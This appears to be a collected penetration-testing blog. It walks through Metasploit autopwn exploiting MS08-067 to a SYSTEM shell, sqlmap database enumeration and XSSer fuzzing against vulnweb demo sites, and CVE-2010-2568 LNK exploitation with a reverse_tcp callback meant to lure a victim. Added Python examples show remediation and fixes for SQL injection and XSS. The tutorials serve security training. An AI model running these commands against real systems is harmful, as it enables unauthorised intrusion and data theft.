Penetration testing


BackTrack 5 R1 released


The BackTrack team has released an updated version of BackTrack 5 (R1) with a lot of new tools and updates. For more information, check out the links below.

http://www.backtrack-linux.org/backtrack/backtrack-5-r1-released/

http://www.backtrack-linux.org/downloads/


Metasploit: A Penetration Tester’s Guide Book Coming Soon


Metasploit: A Penetration Tester’s Guide will teach you how to:

  • Find and exploit unmaintained, misconfigured, and unpatched systems
  • Perform reconnaissance and find valuable information about your target
  • Bypass anti-virus technologies and circumvent security controls
  • Integrate Nmap, NeXpose, and Nessus with Metasploit to automate discovery
  • Use the Meterpreter shell to launch further attacks from inside the network
  • Harness standalone Metasploit utilities, third-party tools, and plug-ins
  • Learn how to write your own Meterpreter post exploitation modules and scripts

http://www.amazon.com/Metasploit-Penetration-Testers-David-Kennedy/dp/159327288X


BackTrack 5 Released


Finally

The BackTrack Dev team has worked furiously in the past months on BackTrack 5, code name “revolution”. Today, we are proud to release our work to the public, and then rest for a couple of weeks.

This new revision has been built from scratch, and boasts several major improvements over all our previous releases.

http://www.backtrack-linux.org/backt…rack-5-release

http://www.backtrack-linux.org/downloads/

Direct Downloads

http://mirrors.rit.edu/backtrack/


Nexpose + Metasploit = Shell


In the last post I showed how to install Nexpose on BackTrack 4 RC2; today we will see how to use Nexpose through msf.

Metasploit has a Nexpose plugin through which we can log in to Nexpose, scan the target system and import the scan results into Metasploit. msf then looks for exploits matching those vulnerabilities and runs them automatically; if the target system is vulnerable, we get an interactive shell. Let's begin.

1) Run the Nexpose scanner

2) Start Metasploit

root@bt:/pentest/exploits/framework3# ./msfconsole

msf > db_driver sqlite3

msf > db_create

msf > load nexpose

msf > nexpose_connect punter:[email protected]

msf > nexpose_scan -x 192.168.0.102

msf > sessions -i 1


Check out the interactive text snapshot below.

root@bt:/pentest/exploits/framework3# ./msfconsole

o                       8         o   o
8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 636 exploits - 319 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r11120 updated 17 days ago (2010.11.24)

Warning: This copy of the Metasploit Framework was last updated 17 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:

http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf > db_driver sqlite3
[*] Using database driver sqlite3
msf > db_create
[-]
[-] Warning: The db_create command is deprecated, use db_connect instead.
[-]          The database and schema will be created automatically by
[-]          db_connect. If db_connect fails to create the database, create
[-]          it manually with your DBMS's administration tools.
[-]
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db
msf > load nexpose

____             _     _ _____   _   _     __  __
|  _ \ __ _ _ __ (_) __| |___  | | \ | | ___\ \/ /_ __   ___  ___  ___
| |_) / _` | '_ \| |/ _` |  / /  |  \| |/ _ \\  /| '_ \ / _ \/ __|/ _ \
|  _ < (_| | |_) | | (_| | / /   | |\  |  __//  \| |_) | (_) \__ \  __/
|_| \_\__,_| .__/|_|\__,_|/_/    |_| \_|\___/_/\_\ .__/ \___/|___/\___|
|_|                                   |_|

[*] NeXpose integration has been activated
[*] Successfully loaded plugin: nexpose
msf > nexpose_connect punter:[email protected]
[*] Connecting to NeXpose instance at 127.0.0.1:3780 with username punter...
msf > nexpose_scan -x 192.168.0.102
[*] Scanning 1 addresses with template pentest-audit in sets of 32
[*] Completed the scan of 1 addresses
[*] Launching an automated exploitation session
[*] Analysis completed in 26 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*]                             Matching Exploit Modules
[*] ================================================================================
[*]   192.168.0.102:445  exploit/windows/smb/ms08_067_netapi  (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos, CVE-2008-4250, CVE-2008-4250, OSVDB-49243, MSB-MS08-067, NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*]   192.168.0.102:445  exploit/windows/smb/ms06_040_netapi  (CVE-2006-3439)
[*] ================================================================================
[*]
[*]
[*] (1/2 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.0.102:445...
[*] (2/2 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.0.102:445...
[*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] (2/2 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] Meterpreter session 1 opened (192.168.0.104:18282 -> 192.168.0.102:1067) at Sat Dec 11 03:40:01 -0500 2010
[*] (2/2 [1 sessions]): Waiting on 1 launched modules to finish execution...
[*] (2/2 [1 sessions]): Waiting on 0 launched modules to finish execution...
[*] The autopwn command has completed with 1 sessions
[*] Enter sessions -i [ID] to interact with a given session ID
[*]
[*] ================================================================================

Active sessions
===============

Id  Type                   Information                            Connection                                 Via
--  ----                   -----------                            ----------                                 ---
1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ TESTBOX-85474D5  192.168.0.104:18282 -> 192.168.0.102:1067  exploit/windows/smb/ms08_067_netapi

[*] ================================================================================

msf > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 1040 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 192.168.0.102
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1

C:\WINDOWS\system32>exit
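
The "Matching Exploit Modules" block above is the part of this output that matters once the engagement is over: it is the scanner-to-exploit cross-reference that tells the system owner exactly what to patch. As an added example (my own code, not part of the original post and not the Metasploit or NeXpose plugin's code), here is a small Python parser that turns those lines into a per-service remediation list keyed by CVE and Microsoft bulletin, deduplicating the references the plugin repeats (CVE-2008-4250 and the NEXPOSE id both appear twice on the first line). The sample input is the block copied from the session output; the regular expression, function names and output structure are my own assumptions about the format.

```python
import re
from collections import OrderedDict

# Constructed sample: the "Matching Exploit Modules" block as printed by the
# nexpose_scan -x run above, copied from the console output on this page.
SAMPLE_AUTOPWN_OUTPUT = """\
[*] ================================================================================
[*]                             Matching Exploit Modules
[*] ================================================================================
[*]   192.168.0.102:445  exploit/windows/smb/ms08_067_netapi  (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos, CVE-2008-4250, CVE-2008-4250, OSVDB-49243, MSB-MS08-067, NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*]   192.168.0.102:445  exploit/windows/smb/ms06_040_netapi  (CVE-2006-3439)
[*] ================================================================================
"""

# One matching-module line: "[*]   host:port  module/path  (ref, ref, ...)".
# The pattern is my reading of the lines above, not a format the plugin documents.
MATCH_LINE = re.compile(
    r"^\[\*\]\s+(?P<host>[\d.]+):(?P<port>\d+)\s+(?P<module>\S+)\s+\((?P<refs>.*)\)\s*$"
)


def parse_matching_modules(text):
    """Return one dict per matched exploit module, with its references deduplicated."""
    findings = []
    for line in text.splitlines():
        m = MATCH_LINE.match(line)
        if not m:
            continue
        # The plugin repeats references (CVE-2008-4250 and the NEXPOSE id appear
        # twice on the first line); keep each one once, in first-seen order.
        refs = list(OrderedDict.fromkeys(
            r.strip() for r in m.group("refs").split(",") if r.strip()))
        findings.append({
            "host": m.group("host"),
            "port": int(m.group("port")),
            "module": m.group("module"),
            "refs": refs,
            "cves": [r for r in refs if r.startswith("CVE-")],
            "bulletins": [r[len("MSB-"):] for r in refs if r.startswith("MSB-")],
        })
    return findings


def remediation_list(findings):
    """Group findings per host:port into the CVEs and bulletins that need patching."""
    by_service = {}
    for f in findings:
        key = "%s:%d" % (f["host"], f["port"])
        entry = by_service.setdefault(key, {"cves": set(), "bulletins": set(), "modules": []})
        entry["cves"].update(f["cves"])
        entry["bulletins"].update(f["bulletins"])
        entry["modules"].append(f["module"])
    return {
        key: {"cves": sorted(v["cves"]), "bulletins": sorted(v["bulletins"]), "modules": v["modules"]}
        for key, v in by_service.items()
    }


if __name__ == "__main__":
    for service, info in remediation_list(parse_matching_modules(SAMPLE_AUTOPWN_OUTPUT)).items():
        print(service, "patch:", ", ".join(info["bulletins"]), "covers", ", ".join(info["cves"]))
```

Run against the sample, the second module only carries a CVE and no MSB reference, so the bulletin list for 192.168.0.102:445 comes out as MS08-067 alone; a report generated from this output should still cross-check CVE-2006-3439 against the vendor's own advisory rather than assume the reference list is complete.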

Using SQLMap for SQL Injection


We have been using a lot of tools for SQL injection while pentesting; today we will see how to use SQLMap, an open source database fingerprinting tool which works without many false positives. We will test this tool on the http://testphp.vulnweb.com demo site.

1) Database fingerprinting

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 11:52:47

[11:52:47] [INFO] using '/pentest/database/sqlmap/output/testphp.vulnweb.com/session' as session file
[11:52:47] [INFO] resuming injection point 'GET' from session file
[11:52:47] [INFO] resuming injection parameter 'cat' from session file
[11:52:47] [INFO] resuming injection type 'numeric' from session file
[11:52:47] [INFO] resuming match ratio '0.701' from session file
[11:52:47] [INFO] resuming 0 number of parenthesis from session file
[11:52:47] [INFO] resuming back-end DBMS 'mysql 5' from session file
[11:52:47] [INFO] testing connection to the target url
[11:52:48] [INFO] testing for parenthesis on injectable parameter
[11:52:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5

[*] shutting down at: 11:52:48

2) Finding the database name and current user


./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --current-db --current-user

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 11:57:13

[11:57:13] [INFO] using '/pentest/database/sqlmap/output/testphp.vulnweb.com/session' as session file
[11:57:13] [INFO] resuming injection point 'GET' from session file
[11:57:13] [INFO] resuming injection parameter 'cat' from session file
[11:57:13] [INFO] resuming injection type 'numeric' from session file
[11:57:13] [INFO] resuming match ratio '0.701' from session file
[11:57:13] [INFO] resuming 0 number of parenthesis from session file
[11:57:13] [INFO] resuming back-end DBMS 'mysql 5' from session file
[11:57:13] [INFO] testing connection to the target url
[11:57:17] [INFO] testing for parenthesis on injectable parameter
[11:57:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[11:57:17] [INFO] fetching current user
[11:57:17] [INFO] retrieved: acuart@localhost
current user:    'acuart@localhost'

[11:58:45] [INFO] fetching current database
[11:58:45] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': acuart
current database:    'acuart'

[11:58:45] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 11:58:45

3) Enumerate databases

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 12:00:57

[12:00:58] [INFO] using '/pentest/database/sqlmap/output/testphp.vulnweb.com/session' as session file
[12:00:58] [INFO] resuming injection point 'GET' from session file
[12:00:58] [INFO] resuming injection parameter 'cat' from session file
[12:00:58] [INFO] resuming injection type 'numeric' from session file
[12:00:58] [INFO] resuming match ratio '0.701' from session file
[12:00:58] [INFO] resuming 0 number of parenthesis from session file
[12:00:58] [INFO] resuming back-end DBMS 'mysql 5' from session file
[12:00:58] [INFO] testing connection to the target url
[12:00:58] [INFO] testing for parenthesis on injectable parameter
[12:00:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[12:00:58] [INFO] fetching database names
[12:00:58] [INFO] fetching number of databases
[12:00:58] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': 3
[12:00:58] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': information_schema
[12:00:58] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': acuart
[12:00:58] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': modrewriteShop
available databases [3]:
[*] acuart
[*] information_schema
[*] modrewriteShop

[12:00:58] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 12:00:58

4) Enumerate database tables and columns

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --tables --columns

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 12:03:27

[12:03:27] [INFO] using '/pentest/database/sqlmap/output/testphp.vulnweb.com/session' as session file
[12:03:27] [INFO] resuming injection point 'GET' from session file
[12:03:27] [INFO] resuming injection parameter 'cat' from session file
[12:03:27] [INFO] resuming injection type 'numeric' from session file
[12:03:27] [INFO] resuming match ratio '0.701' from session file
[12:03:27] [INFO] resuming 0 number of parenthesis from session file
[12:03:27] [INFO] resuming back-end DBMS 'mysql 5' from session file
[12:03:27] [INFO] testing connection to the target url
[12:03:28] [INFO] testing for parenthesis on injectable parameter
[12:03:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[12:03:28] [INFO] fetching tables
[12:03:28] [INFO] fetching database names
[12:03:28] [INFO] fetching number of databases
[12:03:28] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': 3
[12:03:28] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': information_schema
[12:03:28] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': acuart
[12:03:28] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': modrewriteShop
[12:03:28] [INFO] fetching number of tables for database 'information_schema'
[12:03:28] [INFO] retrieved: 16
[12:03:37] [INFO] retrieved: CHARACTER_SETS
[12:04:52] [INFO] retrieved: COLLATI

It was so easy to enumerate these details with this tool; next I will write about using sqlmap for advanced techniques.
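
The "numeric" injection type that sqlmap resumes from its session file is the key detail for anyone who has to fix a page like listproducts.php: it means the cat parameter is pasted into the query unquoted, so the whole enumeration above rests on one string concatenation. As an added example (my own code, not the demo site's and not sqlmap's), the following Python snippet shows that defect beside its fix on an in-memory SQLite table: the concatenated query, the same query with a bound parameter, and a version that also validates the type. The table, its columns and the product rows are constructed for the example and are not the demo site's real schema.

```python
import sqlite3

# Constructed stand-in for the demo site's product table; the schema, the
# table name and the rows are assumptions for this example, not the site's own.
SAMPLE_PRODUCTS = [
    (1, 1, "Posters"),
    (2, 1, "Stickers"),
    (3, 2, "Bags"),
    (4, 3, "Mugs"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, cat INTEGER, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", SAMPLE_PRODUCTS)
    return conn


def list_products_vulnerable(conn, cat):
    # The request parameter is pasted straight into the SQL text, unquoted.
    # This is the "numeric" injection point sqlmap reports for ?cat=1.
    query = "SELECT id, name FROM products WHERE cat = " + cat + " ORDER BY id"
    return conn.execute(query).fetchall()


def list_products_bound(conn, cat):
    # Same query with a bound parameter: the value is sent as data, so the
    # database never interprets any part of it as SQL.
    query = "SELECT id, name FROM products WHERE cat = ? ORDER BY id"
    return conn.execute(query, (cat,)).fetchall()


def list_products_validated(conn, cat):
    # Binding alone stops the injection; validating the type as well turns bad
    # input into an explicit error instead of a silently empty result set.
    try:
        cat_id = int(cat)
    except (TypeError, ValueError):
        raise ValueError("cat must be an integer")
    return list_products_bound(conn, cat_id)


if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1 OR 1=1"):
        print(repr(value), "concatenated:", len(list_products_vulnerable(db, value)), "rows;",
              "bound:", len(list_products_bound(db, value)), "rows")
```

With the legitimate value "1" all three functions return the same two rows; with "1 OR 1=1" the concatenated query returns the entire table, the bound query returns nothing, and the validated version raises. The validated form is the one to prefer for a numeric id, because an empty result from the bound query would otherwise look like a normal "no products" page in the application logs.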

Two methodologies for physical penetration testing using social engineering


Below is a paper describing two methodologies for conducting physical penetration testing using social engineering.

http://whitepapers.hackerjournals.com/wp-content/uploads/2010/07/Two-methodologies-for-physical-penetration-testing-using-social-engineering.pdf


Detecting and exploiting XSS injections using XSSer Tool


What is XSSer?

XSSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications.

We will test this tool on the http://testasp.vulnweb.com/ vulnerable site.

How to use this tool

  1. root@punter:/pentest/web# svn co https://xsser.svn.sourceforge.net/svnroot/xsser xsser
  2. root@punter:/pentest/web# cd xsser
  3. root@punter:/pentest/web/xsser# python XSSer.py -u "http://testasp.vulnweb.com" -g "Search.asp?tfSearch=" --proxy "http://127.0.0.1:8118" --referer "666.666.666.666" --user-agent "correct audit" --Fuzz -s
  4. Below are the results.

See the results above, marked in blue, and the attack URL; we will test the results manually to confirm the XSS vulnerability. Check the screenshot below.

This tool works perfectly at finding XSS through its automation process.
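
The manual confirmation step the post mentions is the same test XSSer automates: send a value with markup in it and see whether Search.asp returns it with the markup intact. As an added example (my own code, not XSSer's and not the demo site's), here is a Python stand-in for that page showing the vulnerable behaviour beside its fix: one renderer echoes the tfSearch value raw, the other HTML-encodes it, and a check function reports whether a marker probe came back unencoded. The probe string, the page markup and the function names are constructed for the example.

```python
import html

# A constructed marker, not a real payload: it only needs to carry markup so we
# can tell whether the page returns it intact or encoded.
PROBE = '"><i>xss-probe</i>'


def render_search_vulnerable(term):
    # Echoes the tfSearch value straight into the HTML, so any markup in it
    # becomes part of the page, both inside the input's value attribute and in the body text.
    return '<form><input name="tfSearch" value="%s"></form><p>Results for: %s</p>' % (term, term)


def render_search_safe(term):
    # Output encoding: html.escape with quote=True also encodes the double quote,
    # which matters because the value is reflected inside an attribute as well as in body text.
    safe = html.escape(term, quote=True)
    return '<form><input name="tfSearch" value="%s"></form><p>Results for: %s</p>' % (safe, safe)


def is_reflected_unescaped(response_body, probe=PROBE):
    """The manual confirmation step: is the probe present with its markup intact?"""
    return probe in response_body


def check_reflection(render, probe=PROBE):
    """Drive one renderer with the probe and report what a tester would log."""
    body = render(probe)
    return {
        "reflected_unescaped": is_reflected_unescaped(body, probe),
        "encoded_form_present": html.escape(probe, quote=True) in body,
    }


if __name__ == "__main__":
    print("vulnerable:", check_reflection(render_search_vulnerable))
    print("safe:      ", check_reflection(render_search_safe))
```

Note that the fix is applied where the value is written into the page, not where it is read from the request: the safe renderer still shows the user exactly what they typed, it just cannot become markup.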

SAP Penetration Testing Video and Slides by Mariano Nunez Di Croce


SAP stands for Systems, Applications and Products in Data Processing, and is the world’s fourth largest software enterprise. SAP is headquartered out of Germany and is best known for its Enterprise Resource Planning (ERP) software which has deployments in over 41,000 companies around the world. Mariano’s presentation is very in-depth and starts with basics of a SAP installation and slowly builds on the various security vulnerabilities which exist and then moves on to how to exploit them while pentesting. He also discusses the open source tool Sapyto, which he maintains and distributes.

Detailed video on testing SAP applications

http://www.securitytube.net/SAP-Pene…%29-video.aspx

Slides from Mariano’s Blackhat presentation
http://www.blackhat.com/presentation…ing-slides.pdf

Exploiting Windows LNK vulnerability (CVE-2010-2568)


Recently a new 0-day exploit has been detected which takes advantage of Windows incorrectly parsing shortcuts, so that malicious code can be executed when the icon of a specially crafted shortcut is displayed. This can be exploited locally through a malicious USB drive, or remotely via network shares and WebDAV. Metasploit has recently pushed the exploit as an msf module. There is still no patch released for this vulnerability.

There are two ways to exploit this:

1) Keep the two files, the LNK file and the DLL, on a USB stick and run them on the victim machine, or
2) trick the victim into accessing the malicious site.

We will use the second method.

3) svn update (update your msf)
4) use windows/browser/ms10_xxx_windows_shell_lnk_execute
5) set payload windows/meterpreter/reverse_tcp
6) set LHOST 192.168.0.103 (your IP)
7) set LPORT 1427 (any port)
8) exploit

Check out my video on accomplishing the above method: Exploiting Windows LNK vulnerability (CVE-2010-2568)

NeoPwn Nokia N900 Mobile Penetration Testing device


The Nokia N900 has just been released in our country, and I am planning to buy this awesome device to install the NeoPwn operating system on it; NeoPwn has most of the BackTrack tools ported to Debian for this device. The NeoPwn beta will be released later this month.

NeoPwn project details

http://www.neopwn.com/

Check out the teaser videos
